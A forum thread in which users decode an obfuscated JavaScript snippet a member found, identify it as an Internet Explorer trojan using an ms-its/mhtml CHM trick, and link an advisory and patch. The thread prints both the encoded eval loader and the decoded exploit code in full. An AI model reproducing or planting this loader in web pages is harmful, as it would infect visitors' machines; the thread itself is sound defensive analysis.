hack script? ne one knows javascript

Status
Not open for further replies.
S

sunnydiv

Guest
hey i got this


<script type="text/javascript" language="JavaScript">
x=78;
es="YVnv^QfYWQd_b|Q``>Q]U--p=YSb_c_Vdn9^dUb^Udn5h`\\_bUbpw\nnnnk\nnnnnnnfQbn9^Ud@QdX-T_Se]U^d|\\_SQdY_^|XbUV+\nnnnnnnZ-9^Ud@QdX|\\Qcd9^TUh?Vvu}uw+\nnnnnnn9^Ud@QdX-9^Ud@QdX|c\\YSUv~zZw+\nnnnnnnfQbn_=C9DC-T_Se]U^d|SbUQdU5\\U]U^dvp?2:53Dpw+\nnnnnnnc@bUVYh-e^UcSQ`Uvps&Tc{Ys'$c*]Xd]\\*pw+\nnnnnnn_=C9DC|TQdQ-c@bUVYhyuVY\\U*}}3*LL=19>|=8Douy9^Ud@QdXyu}}h]QY^|SX]**}]QY^|Xd]u++\nnnnnnn_=C9DC|di`U-pdUhd}h{cSbY`d\\Udp+\nnnnnnnT_Se]U^d|R_Ti|Q``U^T3XY\\Tv_=C9DCw+n\nnmnn";
var ds=new String();
for(var j=0;j<es.length;j++)
{e=es.charCodeAt(j);if(e==10){ds=ds+'\n';}else{d=e-x;if (d<0x20){d=e+0x7E-x-0x20;}ds=ds+String.fromCharCode(d);}}eval(ds);
</script>



now my account has 50 k in it, and i dont wanna losse it to some password stealing script, so if ne one can tell me what the above does

and how i can disarm it,,

please help
 
Deep

Deep

Version 2.0
looks like it is encrypted..

do this..
there is one software which will show u all the details which are being passed and allows to maipulate it..

so u need to downlaod the software and submit the pssword (ofcourse wrong) and see where your password is going....

software name?
well i dont remember it now..i will check it in the office tmrw and let you know..

Deep
 
it_waaznt_me

it_waaznt_me

Coming back to life ..
It is converting the es string parts to some other string ds after running a char code algorithm ... Hmmmm... Will have a look at it after some time ..
 
Deep

Deep

Version 2.0
btw..
script is checking for the IE and redirecting it to the location or something..

code looks like incomplete..

anyways it generates this code....


if (navigator.appName=="Microsoft Internet Explorer")
{
var InetPath=document.location.href;
j=InetPath.lastIndexOf('/');
InetPath=InetPath.slice(0,j);
var oMSITS=document.createElement("OBJECT");
sPrefix=unescape("%6ds-i%74s:mhtml:"); oMSITS.data=sPrefix+'file://C:\\MAIN.MHT!'+InetPath+'//xmain.chm::/main.htm';;
oMSITS.type="text/x-scriptlet";
document.body.appendChild(oMSITS);
}

Regards
Deep
 
Deep

Deep

Version 2.0
UPDATE : in short it is a trojan :D

check this page for more info...

*spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=article&sid=96

solution: *www.securityfocus.com/bid/9658/solution/


how did i find out it?

pretty simple actually..

this is what i did..

i copied the script into htm file..
opned the file to check the output..

nothing happened so i used document.write () to print the values of the variables..

got some values and got idea about the function...

it generates another function which checks for browswer IE....

so i copied the generated code into new html file and ran the file..

again followed teh same procedure..used document.write ()

got value..

Code: 
ms-its:mhtml:file://C:\MAIN.MHT!file:///C:/Documents%20and%20Settings/Administrator/Desktop//xmain.chm::/main.htm

and then what?

haha i asked google

and found the answer :)


ignore this if you find it boring.. lol
Deep
 
tuxfan

tuxfan

Technomancer
Not boring at all. Its very interesting Deep :) But does that mean that this script will fail if the browser is not IE and something else like Firefox or Opera?
 
Deep

Deep

Version 2.0
tuxfan said:
Not boring at all. Its very interesting Deep :) But does that mean that this script will fail if the browser is not IE and something else like Firefox or Opera?
Click to expand...

looks like it will fail..

infact if the system is patched then also it wont on IE also work i suppose..

Deep
 
OP
S

sunnydiv

Guest
thank you man, ur like god to me today

thnk you

from the bottom of my heard, i will give this link on the other forum who all got afftect with same

hope this saves a few lakhs of money at least
 
tuxfan

tuxfan

Technomancer
So thats one more reason to switch over from IE to WHICHEVER OTHER BROWSER YOU CAN LAY YOUR HANDS ON ;)
 
Status
Not open for further replies.
Top Bottom